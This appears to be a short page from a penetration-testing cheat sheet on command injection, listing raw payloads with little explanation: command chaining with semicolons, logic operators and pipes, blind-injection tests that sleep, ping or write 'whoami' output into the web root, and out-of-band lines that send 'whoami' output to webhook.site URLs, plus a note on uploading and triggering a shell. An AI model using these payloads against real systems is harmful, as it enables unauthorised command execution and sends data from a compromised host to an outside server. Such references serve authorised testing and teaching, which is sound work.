Command Injection

Exploitation

Basic command chaining

; ls -la

Using logic operators

&& ls -la

Commenting out the rest of a command

; ls -la #

Using a pipe for command chaining

| ls -la

Testing for blind injection

; sleep 10
; ping -c 10 127.0.0.1
& whoami > /var/www/html/whoami.txt &

Out-of-band testing

& nslookup webhook.site/<id>?`whoami` &
https://webhook.site/55423ec0-8c07-42cd-8346-1f91cff37e05?`whoami`
checking for new line

Upload Shell

We can also upload a shell and trigger it. Directly inputting a commad may get filtered

Checking supported shells

which python
which php
PreviousXSSNextFile Upload

Last updated